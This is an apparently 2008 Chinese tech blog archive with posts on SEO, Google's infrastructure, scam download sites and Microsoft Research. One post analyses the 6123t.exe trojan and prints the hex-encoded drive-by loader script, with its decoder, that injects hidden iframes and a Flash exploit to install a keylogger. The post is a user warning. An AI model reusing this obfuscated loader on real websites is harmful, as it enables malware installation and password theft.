2008年7月2日 星期三

網路行銷 : SEO 五大要素



許多網路業者都提供SEO(Search Engine Optimization)服務, 有些是白帽式的(White Hat), 也就是中規中矩的來改善您的網站品質, 也有些是黑帽式的(Black Hat), 也就是利用搜詢引擎的漏洞來提昇搜尋排名, 而現在已經不止企業需要進行SEO, 連部落客也都需要SEO來拉抬人氣, 因此對於SEO種種觀念是否正確就顯得非常重要, 如果對於SEO的觀念不夠正確而誤用了看似有效的黑帽式SEO技倆, 付出的代價可能會讓您哭不出來 ...

先就SEO的五大要素來說明, 而這些元素互為表裡並且相互影響, 因此不可能只針對單一元素來進行SEO

(1)網頁指標 - 不同的搜詢引擎會使用不同的網頁指標, 其中較耳熟能詳的網頁指標大抵是Google的PageRank與Alexa的AlexaRank, 另外就是您的網頁存在搜詢引擎中的backlink或inlink數目

(2)網域名稱 - 網域名稱是否有意義, 後綴為何以及網域名稱註冊時間的長短都會影響SEO的成效, 例如租車網站來說, CarRental.com基本上就比myCarWeb.com來得優, CarRental.com就比CarRental.org優勢, 而承接已經註冊很久的網域名稱就比新註冊的來得容易進行SEO, 如果您使用部落格服務提供的網域名稱, 也需要先觀察哪些部落格網域名稱具有較高的網頁指標

(3)網站流量 - 網站的訪客量會直接影響AlexaRank, 也會間接影響PageRank, 以往PageRank與流量關係不大, 但是自從去年Google修改演算法之後, 流量與PageRank的關係有增加的現象

(4)網站內容 - 當然網站有許多高品質的內容, 相對的會提升流量, 也會影響網頁指標, 並且網站內容應該與您選擇的keyword結合, 將keyword自然而平均的散佈在網頁內容裡

(5)網站結構 - 網站結構屬於比較技術性的, 許多SEO廠商喜歡從這裡著手

在說明如何進行SEO之前, 先來談談search engine, 我們先以較淺顯的方式來說明, search engine當然希望能夠最精確的找出使用者需要的內容, 因此以search engine的角度來看, 你的網站就必須讓search engine能夠理解, 並且以最"自然"的方式告訴search engine

以上牽涉到兩個重點: 以自然的方式, 讓search engine理解

許多SEO業者都忽略了以自然的方式來呈現, 例如為了增加backlink而在一天之內於網路上增加某頁面成千上萬的link, 這樣的link是會被search engine過濾掉的, 因為不夠自然, search engine對於黑帽式的SEO是持續的監看與反制的, 因此不要花太多力氣去製造無用的backlink

因此對於search engine的瞭解是製作網頁很重要的課題, 另外根據觀察, Google對於具有學術參考價值的網頁有特別的偏好, 因此在您的網站多增加一些這類內容是不錯的選擇

再來就以Q&A的方式來細談一些SEO的內容 ...

(1)SEO的程序應該如何進行?

- 瞭解您的競爭對手, 用上述的五個元素來解析競爭對手的網站, 並選擇您要的關鍵字
- 先瞭解上述網域名稱的特性來決定使用舊有的網域名稱, 還是乾脆另站重新來過選擇新的網域名稱
- 解析您的網站結構, 如title, meta, 目錄結構等...
- 構思您的網站內容策略, 並注意backlink品質
- 利用交換聯結, 公用書籤 ... 等等方式增加曝光度與流量
- 網站完成並經營一段時間後, 開始submit到各大search engine與dmoz
- 善用Google網站管理工具與分析工具

上面說的程序看似簡單, 但過程都是相當繁瑣, 舉個簡單的例子: 您當然希望別的高PR的頁面能夠link到您的網站, 但是不如注意自己網頁的PR值, 在自己有高PR值的頁面連回自己網頁, 本網提供的PR貼紙(PageRank Checker)就可以讓你瀏覽自己網站時隨時動態瞭解PR的變化, 當觀察到自己頁面有高於1的PR時, 就以自然的方式增加幾個link回其他頁面

(2)關鍵字出現在自己網頁的密度越高越好嗎?

答案是否定的, 同樣的關鍵字的密度也必須以自然的方式顯示, 以meta中的title為例子, 一般而言關鍵字不要超過title的一半, 最好保持在30%~50%左右

如果"相機"是您的關鍵字, title為"相機網-專業攝影器材網站"比title為"相機網"好一些

(3)為什麼要網站完成後再送到各搜詢引擎?

DMOZ來講, 如果您的網站尚未完工, 可能被直接刪除或擱置一旁, 可能變成永遠不會被處理的網站

(4)如何增加backlink?

如果能夠有好的內容, 然後利用網路公用書籤是最佳的方式, 其次就是交換聯結,參加一些網頁排名,透過DMOZ服務, 不要太迷信其他旁門左道的黑帽式方法

林林總總說了一堆, SEO絕對是一項人力密集的工作, 沒有一個軟體或簡單步驟可以達成目的, 而且如果沒好的內容, 做半天SEO也不會太有效, 因此回歸到原點, 還是好好思考如何提供有品質的內容, 再來煩惱SEO吧!

標籤: , , ,

繼續閱讀

2008年6月25日 星期三

Google資料中心的秘密



Google提供全球大量的服務,幾乎已經快橫跨整個資訊科技的服務,但是Google資料中心的內部運作一直都是秘而不宣,許多人可能都碰過Google的服務出狀況,但是這些狀況總能在可容忍的範圍內解決,你可能發現你的Gmail的容量一直在改變,是什麼架構讓空間像捏橡皮糖一樣越捏越大?前陣子Google伙伴Jeff Dean在Google I/O會議中稍微揭開了公司基礎設施的神秘面紗。

Google的神秘面紗包括了: (1)軟體 (2)硬體 (3)叢集平行處理機置

Google軟體的三個核心要素:GFS(Google檔案系統)、BigTable和MapReduce演算法。而硬體卻是一般的伺服器、處理器、硬碟、記憶體等等。另一方面伺服器的叢集能在半秒之內回應700至1,000台伺服器的搜尋請求。

根據Google的說法,GFS是"a scalable distributed file system for large distributed data-intensive applications. It provides fault tolerance while running on inexpensive commodity hardware, and it delivers high aggregate performance to a large number of clients". 就是這個GFS的分散式檔案系統,讓Google服務可以隨時長出空間或是切去毀損的部分,而管理這個GFS的機置就是BigTable。目前有超過200個叢集在執行GFS,其中許多都包含數千台主機。

GFS把一塊儲存的資料(通常是64MB),至少放在三台稱為chunkserver的主機內。

如果chunkserver發生故障,Master Server(主伺服器)便負責把資料備份到一個新的地方。至少在儲存層級,主機故障完全由GFS系統處理。

Google到底擁有多少台伺服器?據Dean表示,每個機櫃存放40台伺服器。而根據某項估計,Google目前在全球有36個資料中心,以每個中心有150個機櫃計算,Google的伺服器至少超過20萬台,並且每天都在增加中...下圖就是Google最早期的server rack,當然目前的硬體比這個肯定更驚人了。



Google之所以成為Google,部分原因是他們推翻了電腦界的傳統作法。當所有的超大型資料中心都使用主流伺服器和軟體,Google的資料中心絕大部分是靠本身的技術構建而成。Google把命運操縱在自己手中,共同創辦人Larry Page鼓勵員工"別太相信有什麼不可能的事情"。

要維持如此大規模的運作,也許可以說全世界是卯起來操Google的架構,Google必須對每一台機器抱有一種隨時可犧牲的態度。伺服器製造商喜歡主打他們的高階主機承受故障或當機的能力,但Google寧願把錢投資在容錯軟體上。他們認為擁有兩倍數量但較不可靠的硬體,勝過一半數量但較可靠的硬體。你必須在軟體的層級提供可靠度,如果你有1萬台主機在運作,每天一定會有一些東西掛掉。這個跟我們一般的認知確實有蠻大的差異,我們通常都希望有數量雖少,但功能穩定的機器,而不願意有一大籮筐兩光的機器。

每個新叢集上線的第一年,通常會發生1,000次個別主機的故障,數千次硬碟故障...

一次電力輸送問題,導致500至1,000台主機失效約6小時...

20次機櫃損壞,每次造成40至80台主機下線...

5次機櫃搖晃,導致半數的網路封包在傳送過程中遺失...

整個叢集至少一次重新上線,在兩天之內的任何時間,影響5%的主機...

整個叢集還有一半的機率會過熱,在5分鐘之內讓幾乎所有伺服器當機,並且花上1到2天的時間恢復...

雖然Google用一般硬體組件來組裝其伺服器,但卻不用傳統的封裝,他們要求Intel提供特製的主機板。Google目前在每40台伺服器的機櫃外,包覆一層外殼,而不是每台伺服器有個別的外殼。

Google在2004年開始設計的BigTable,用BigTable為所有資料提供若干結構,目前用在超過70個Google計畫,包括Google Maps、Google Earth、Blogger、Google Print、Orkut和核心搜尋索引。最大的BigTable實用範例管理橫跨數千台主機、約6 PT(petabytes)的資料。

Google在2003寫出第一版的MapReduce,讓該公司有辦法實際發揮那些資料的用處。舉例來說,MapReduce能找出某個特定字彙在Google的搜尋索引中出現的次數、列出所有特定字彙出現的網頁,和連結到某個特定網站的所有網站。

利用MapReduce,Google能用相對迅速的時間,建立一個包含"digital"、"network"和"society"三個字的所有網頁索引。"Dean說:「你必須能夠依序地橫跨數千台主機作業,才能在一個合理的時間內完成這項工作。」

MapReduce軟體在Google內部的應用日漸增加,2004年8月,該軟體執行2.9萬項工作,到2007年9月,已經暴增到220萬項。在這段期間,完成一項工作的平均時間也從634秒降至395秒,而MapReduce的工作產出則從193 terabytes上升到約1.4萬terabytes。Dean說,Google在任何一天都要執行約10萬項MapReduce工作,每一項工作佔用400台伺服器,且需要5到10分鐘完成。

MapReduce就像GFS,是特別設計用來迴避伺服器問題的。Dean表示:「當某台主機故障,主伺服器知道那台機器正在執行什麼工作,將命令其他主機接手那項map工作。你可能影響到100個map工作,但會有100台主機接手那些工作。」

MapReduce的可靠度一度遭到嚴厲的試煉,當時一個1,800台伺服器的叢集正進行維護作業,工作人員一次拔下80台主機的插頭,同時另外1,720台主機必須接下停頓的工作。Dean說:「速度變得有點慢,但工作全部完成。」而在一次2004年的簡報中,一個1,800台叢集的系統,承受了1,600台伺服器同時故障。

所以,Google資料中心的運作似乎如魚得水,一切順利。但該公司還不滿足,列出了一長串待改進的事項。大多數公司都試圖找出如何平順地將工作在伺服器之間轉移,但Google已經超越了那項挑戰,他們要能夠自由、平順,且自動地,將工作在各個資料中心間轉移。

Dean說:「我們下一代的基礎設施要是一個能夠橫跨大區塊主機轉移,而非單一機器的系統。」目前,某些大型的檔案系統具有不同的名稱,如GFS/Oregon和GFS/Atlanta,但他們都是彼此的拷貝。他表示:「我們要一個單一的名稱集。」

Google種種獨創的系統替他們開創了天下,也建立了其他競爭者很難跨過的門檻,但是隨著越來越複雜的環境,Google自己需要解決的問題,肯定挑戰會越來越大。

標籤: , , , , , ,

繼續閱讀

2008年6月16日 星期一

網路騙術何其多


(可點圖放大, 圖一: 網站看起來很正常, 但其實就是要騙你加入付費)

近日在網路上搜尋一些檔案, 真是被垃圾網站搞得啼笑皆非, 這些垃圾網站提供你任何你搜尋的內容, 你需要建置SOA的Web Services List? 他們有! 你需要Java建立on-the-fly的統計圖表? 他們有! 你需要衣索匹亞的GPS地圖? 他們有!


當然點進去之後, 只有兩種結果: 讓你誤點他們的廣告, 或是誘導你付出幾塊錢美金加入會員, 但這兩種結果都只能算是一種, 就是讓你被騙!

起初還真佩服這些網站, 哇! 什麼東東都有! 但是點進去...先付$4.95, 而且只優惠到月底, 讓你整年無限下載...但是仔細用各種方式評估, 才發現真的好笑到不行!

我們現在來看看這些好笑的網站, 特別打入非常特殊的關鍵字: 老狗與小烏龜
哈哈哈....看看下圖, 還有最新2008版本呢!


(可點圖放大, 圖二: 打入老狗與小烏龜, 哈...還有檔案讓你下載!)

再打入更特殊的關鍵字, 試看看

(可點圖放大, 圖三: 哈...也有檔案讓你下載!)


(可點圖放大, 圖四: 還有德文版的喔!)


(可點圖放大, 圖五: fuck my chair on the street檔案還真多喔, 而且有很多回覆感謝呢!)


(可點圖放大, 圖六: 老狗與小烏龜還有破解版的喔!)

這些網站只要騙你$4.95, 當被騙的人數多時, 真是一筆不小的收入 ...

真是網路騙術何其多, 真的不要太相信網路上的內容, 多培養專業知識, 以防止被騙失金!

標籤: , ,

繼續閱讀

2008年6月4日 星期三

一群訓練有素的猴子


在之前有一篇文章提到勞力密集的網路科技產業, 這幾天真的很巧, 看到YouTube的網站出現問題, 秀出了這麼一段訊息 ...

500 Internal Server Error
抱歉,發生了錯誤。
我們已調派一群訓練有素的猴子來處理狀況。請將此事件 回報至客戶服務。


YouTube真的太幽默啦, 一群訓練有素的猴子, 不知道被派來處理的工程師做何感想...

說老實話, 搞技術已經20多年, 還真的有種耍猴戲的感覺, 大多時間在處理的事情都是很低層次的問題, 但是這些低層次的問題又都是系統是否能夠正常運作的關鍵

什麼時候才能真正用"訓練有素的猴子"來處理這些雜七雜八的問題? 或什麼時候才能讓這些雜七雜八的問題讓Robot來做?

系統越搞越複雜, 越搞越分散, 常常一個小小的錯誤可以讓一個龐大的系統垮下來 ...

就有這麼一個笑話 ...

在一個龐大的資訊中心, 裡面只有一個人跟一隻狗, 裡面所有運作都已經全部自動化, 這個人的作用就是當自動化出狀況, 需要手動去開關機時, 這個人就去把開關ON或OFF, 而這隻狗幹啥呢?

有人說: 陪這個人吧!

有人說: 當警衛狗吧!

都不是! 這隻狗的作用就是 ....... 看好這個人, 不要讓他隨便去動開關

人的作用如果最後只是用來ON/OFF, 還真悲哀

在還沒變成那麼慘的狀況, 至少還能當隻猴子來用

所以那篇"勞力密集的網路科技產業", 絕對不是蓋你的, 因為我也是這個產業鍊下的一個猴子 ...

標籤: , ,

繼續閱讀

2008年5月30日 星期五

眼見不為真



數位技術可以把一個胖妹變成辣妹, 話不多說, 就自己看看這些影片吧 ...



















下次在網路上看到辣妹照片或看到有人在總統府裸拍, 不要太相信啦 ...

標籤: ,

繼續閱讀

6123t.EXE病毒

近日瀏覽網頁時, 突然ZoneAlarm跳出一個視窗, 詢問是否執行6123t.exe? 當然當下馬上將此程式阻擋, 很難想像如果沒有防火牆的話, 不知又要造成什麼損失 ...

該檔案存在C:\目錄下

檔案名稱 : 6123t.exe
檔案大小 : 13840 byte
檔案類型 : MS-DOS executable (EXE), OS/2 or MS Windows

根據初步瞭解, 該檔案為木馬程式, 會偷取硬碟中的資料, 目前所有防毒軟體都沒有相關訊息, 似乎也都無法防堵, 現在中國大陸已經有多起中毒事件

如果您的電腦在C:\下存在6123t.exe, 而您沒有安裝額外防火牆的話, 就可能已經中毒了, 在尚未確認刪除以前, 就暫時拔掉網路線吧 ...

(追蹤報導)

已經查出來源, 該病毒似乎與此次Flash出問題有關, 並且exe檔未必都是6123t

Adobe Flash Player出現漏洞, 在Adobe釋出修補程式前,最好暫時關閉Flash外掛(或更新到最新版)

當網友瀏覽被入侵的網站時, 會執行以下javascript:

Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
572726F7220526573756D65204E6578740D0A09536574204F62203D20446F63756
D656E742E437265617465456C656D656E7428226F626A65637422290D0A094F622
E5365744174747269627574652022636C6173736964222C2022636C7369643A424
43936433535362D363541332D313144302D393833412D303043303446433239453
336220D0A0953657420506F70203D204F622E4372656174656F626A65637428224
1646F64622E53747265616D222C2222290D0A094966204E6F74204572722E4E756
D626572203D2030207468656E0D0A09094572722E636C6561720D0A0909446F637
56D656E742E77726974652028223C656D626564207372633D5C22666C6173682E7
377665C223E3C2F656D6265643E22290D0A0909446F63756D656E742E777269746
52028223C694672616D65207352633D7265616C2E68746D2077696474683D30206
865696768743D303E3C2F696672416D453E22290D0A0909446F63756D656E742E7
7726974652028223C694672616D65207352633D6E65772E68746D2077696474683
D30206865696768743D303E3C2F696672416D453E22290D0A09456C73650D0A090
9446F63756D656E742E77726974652028223C694672616D65207352633D68656C7
02E68746D2077696474683D30206865696768743D303E3C2F696672416D453E222
90D0A09456E642049660D0A3C2F5363726970743E"
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans)
Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr &
Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" &
Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)

這段經Hex2Str後解碼就不列出了, 它會執行
flash.swf
real.htm
new.htm
help.htm

當啟動flash.swf, 會以URLMON.DLL去下載6123t.exe並執行, 執行後便會將卡巴斯基disable, 並解開ow.dll成為keyboard hook dll, 這個dll就可以監聽鍵盤的輸入, 因此該病毒應該是要偷取密碼

目前尚未中毒的電腦, 最好的方式就是先下載Adoble Flash到9.0.124版本, 並隨時注意Adobe新聞以更新flash的patch

由於被植入惡意程式的網站會越來越多, 預計災情會持續發燒

標籤: ,

繼續閱讀

2008年5月28日 星期三

Microsoft的搜尋與多媒體技術


微軟亞洲研究院成立十週年,院長洪小文(上圖)透露了部份研究成果:搜尋與多媒體技術。目前進行的研究成果包含自動化圖片編輯、與行動定位系統搭配的圖片搜尋、以搜尋為基礎的翻譯技術、哼唱搜尋,以及自動語音合成技術等,全都與多媒體或搜尋技術相關,顯示微軟打算與Google正面交峰的企圖。

與Google Earth與街景服務競爭的圖片搜尋技術稱為Photo2Search,使用者可用手機將街道上的建築物拍攝並上傳至系統,系統便會先取得基地台的位址資料,再將附近街道圖片與使用者上傳之圖片進行比對,比對完成後,再將使用者所需的資訊,如附近地圖、觀光點、建物資訊等訊息回傳給使用者。

傳統的圖片搜尋多半是透過metadata才能進行搜尋,但Photo2Search是透過基地台的位置比對,將搜尋目標範圍縮小後,再針對圖片內容進行畫素分析。

Photo2Search顧名思義就是利用圖片來搜尋,想要知道最近出來的DVD的反應如何?是值得一看還是浪費時間?只要照個像丟上系統查詢...想要知道最近開的餐廳評語如何?也只要照個像丟上系統查詢...

Photo2Search就是要讓: a picture is worth a thousand words , 一張圖片勝過千言萬語, 讓圖片自己與系統對話!

這個技術就是要解決實際世界與數位世界的差異問題, 這項技術的前身是Content Based Image Retrieval (CBIR) - 圖片內容頡取, 但是運算時間長且不易取得同類查詢的結果, Photo2Search使用另外的方式來比對事先取得的圖片資料庫, 這個技術可以運作在圖片、聲音、影片上。

其他關於搜尋的技術研發,還有翻譯搜尋Lingo。透過比對網路上現成的多語言資料,可以更精確找出特定語詞的譯法。至於已被商品化的搜尋技術,則是哼唱搜尋(Query by Humming),藉由哼唱一段歌曲,再透過語音辨識技術來找出資料庫中吻合的曲目,該技術目前已輸出給部分手機鈴聲(ringtone)業者,並已有商業化服務。



該語音合成的發聲特徵來自建模(modeling)技術,任何人只要先花二十分鐘讓系統學習,然後就能用他的聲音唱任何歌曲、說任何話。

這樣一個系統在任何多媒體資料庫上是非常有用的,其中載有音樂的資料庫提供一個替代性和自然的方式查詢。可以廣泛使用這種系統在商業音樂產業、音樂電視台及電台、音樂商店,甚至於個人的使用上。

標籤: , , ,

繼續閱讀